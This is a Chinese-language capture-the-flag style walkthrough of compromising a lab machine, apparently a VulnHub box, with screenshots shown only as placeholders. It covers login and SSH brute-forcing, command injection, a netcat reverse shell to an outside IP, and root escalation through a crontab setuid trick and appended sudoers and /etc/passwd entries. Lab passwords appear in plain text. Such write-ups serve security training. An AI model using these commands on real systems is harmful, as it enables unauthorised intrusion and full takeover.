nmap 扫描端口

image.png
image.png

浏览器访问一下,一个登陆界面,admin 作为用户名 password 爆破一下

image.png
image.png
image.png
image.png

登上以后

image.png
image.png

命令执行!?

image.png
image.png

抓包改一下,发现可以执行其他命令

image.png
image.png

nc 反弹个 shell(我第一时间想到的是 echo 写个 shell 进去,大佬的是 nc 直接用)
nc -e /bin/sh 192.168.149.141 6666

image.png
image.png
image.png
image.png

还是用 python 生成一个好点的交互

image.png
image.png

在 jim 目录下面发现一个 backups 里面有 old-password

image.png
image.png

尝试爆破登录 ssh?哦吼,中奖

image.png
image.png

参数解释:
-l jim 指定爆破账号为 jim
-w 10 指定每个线程的回应时间为 10S
-P pwd.txt 指定密码字典为 pwd.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程
-f 查找到第一个可以使用的账号和密码的时候停止破解

ssh jim@192.168.149.160
密码:jibril04

image.png
image.png

在 /var/mail 目录下查看邮件信息

image.png
image.png
image.png
image.png

得到 charles 的密码:^xHhA&hvim0y,su 切换一下

image.png
image.png

sudo -l 看一下,发现 teehee 不需要密码就可以 root 权限运行

image.png
image.png
image.png
image.png

用来将标准输入复制到文件,也复制到标准输出

使用 teehee /etc/crontab 编辑一下
输入:* * * * * root chmod 4777 /bin/sh

image.png
image.png

再执行:ls -al /bin/dash,然后 /bin/sh 就可以了

image.png
image.png

另两种方法

1、
echo “charles ALL=(ALL:ALL) ALL” | sudo teehee -a /etc/sudoers
sudo su root,然后输入 charles 的密码

image.png
image.png

2、
如果能写在 passwd 里面一个 /bin/sh 的,跟 root 一样的话就可以

image.png
image.png

echo “yichen::0:0:::/bin/sh” | sudo teehee -a /etc/passwd
su yichen

image.png
image.png